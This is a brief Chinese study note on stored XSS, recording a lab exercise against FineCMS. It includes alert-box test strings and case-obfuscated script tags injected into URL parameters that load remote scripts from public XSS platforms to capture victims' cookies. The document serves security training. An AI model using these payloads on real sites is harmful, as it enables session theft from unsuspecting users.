title: “存储型xss”
author: “年轻人”
date: “june 26th, 2021”
存储型xss
xss
提交恶意xss数据,存入应用服务器端,用户访问时被触发
而检验是否存在xss可以通过使用xss弹窗检验<script>alert(1)</script>
防止窃取cookie:http-only(js不能传递cookie)
cms相关漏洞:
/index.PHP?c=mail&m=chen<script>alert(1)</script>
检验是否存在漏洞
靶场作业
第一步:xs.sb用临时邮箱注册账号, 创建项目,选择基础默认模块
第二步:查找finecms的xss漏洞
/index.PHP?c=mail&m=a<script>alert(1)</script>
运用xss平台
http://59.63.200.79:8082/index.PHP?c=mail&m=123<sCRiPt sRC=https://xss.pt/JNRZ></sCrIpT>
http://59.63.200.79:8082/index.PHP?c=text&m=<sCRiPt sRC=//xsshs.cn/pp4O></sCrIpT>
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 [email protected] 举报,一经查实,本站将立刻删除。